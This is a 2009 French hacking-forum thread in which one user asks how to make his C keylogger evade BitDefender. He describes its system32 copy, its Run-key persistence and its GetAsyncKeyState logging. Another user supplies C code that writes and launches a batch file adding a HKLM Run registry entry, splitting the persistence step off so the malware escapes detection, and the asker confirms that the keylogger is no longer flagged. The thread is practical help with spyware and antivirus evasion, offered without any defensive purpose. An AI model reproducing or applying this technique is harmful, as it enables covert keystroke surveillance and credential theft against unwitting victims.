logo

Knowledge Is Power

 
 

- Reinit des nouveaux posts -

- Recherche -

Messages Privés - Derniers posts
S'enregistrer - Login - Liste des membres
Vous logger : Login Pass

Programmation - Langages de Programmation >> Keylogger en C et antivirus Newtopic | Reply
poster txt
hostille
Inscrit le 01-02-2009
Posté le 01-02-2009 09:47

Bonjour


j'ai créer mon Keylogger en C seulement à la compilation il est détecter par Bit Defender 2009. j'ai chercher sur le forum et sur google et je n'ai pas trouver ce que je voulais.
je voudrai savoir comment je pourrais modifier mon code pour qu'il ne soit plus détecter.je veux le modifier vraiment appartir du code source en C et non pas avec la méthode de la signature.

Merci d'avance
profil | edit | quote
jyz93
Inscrit le 05-11-2008
Avatar
Posté le 01-02-2009 12:19

Pour qu'on puisse t'aidé, il nous faudrait plus d'informations...
Le code source de ton programme nous aideré a déterminé les instructions qui pose problème.
Si non fait nous une description détaillé sur l'algorithme de ton programme...
profil | edit | quote
hostille
Inscrit le 01-02-2009
Posté le 01-02-2009 12:31

oui désoler

donc voila dans mon main je fais appel a une fonction qui va permettre d'enregistrer mon keylogger dans la base de registre "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" et d'enregistrer le .exe dans system32 afin qu'il demarre en même temp que l'ordinateur.

et a la suite dans le main se trouve le code pour enregistrer les touche avec l'api GetAsyncKeyState.

les 2 code séparement n'étais pas detecter mais quand je les est assembler il etais détecter.

demander moi si vous avez besoin de plus de renseignement.

dsl pour les faute d'orthographes.
profil | edit | quote
jyz93
Inscrit le 05-11-2008
Avatar
Posté le 01-02-2009 13:52

Voici ce que je te propose pour modifié ta clé de registre :

Code:
FILE* fichier = NULL;

fichier = fopen("test.txt", "w");

if (fichier != NULL)
{
fputs("@echo off\nreg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /v start /d %windir%\\system32\\*.exe /f", fichier); //remplace "*.exe" par le nom de ton programme a lancé a chaque démarrage de la machine
fclose(fichier);
}
rename("test.txt", "registre.bat");
system("start registre.bat");
system("del registre.bat");



En gros d'apres ce que tu m'a dis, il faut séparé les deux codes pour que cela fonctionne.
Ce morceau de code créé donc un fichier .bat qui a pour but de modifié ta clé de registre, et par la suite le lance... (Le code pour modifié ta base de registre se retrouve ainsi séparé du reste)
(je n'ai pas encore testé le code, normalement il fonctionne...)

[ Ce Message a été édité par: jyz93 le 2009-02-01 13:56 ]
profil | edit | quote
hostille
Inscrit le 01-02-2009
Posté le 01-02-2009 16:58

ben j'ai plus cas te dire merci car effectivement le keylogger n'est plus détecter.
profil | edit | quote
Newtopic | Reply

Online : Dorothyhyday, FelipeBub, Felipekt, JacobKeway, Jamesgroub, Jarockkr, Krtbpwhomia, owaviohiolono, Robertbeply et 100 Guests


Retour Index NewFFR Repository : http://taz.newffr.com
Cagades à Stick : http://alcane.newffr.com
Forum HTML et Archive -> ici
ForumFR Sql/Xml (2006/04) (SF pas à jour du tout...) - Alive since 2001 Newffr.com
Pour toute plainte ou problème -> Contacter Borax, Hyatus, Tweakie ou Stick par message privé (ou Gueulez sur le forum :) )
Retour haut de page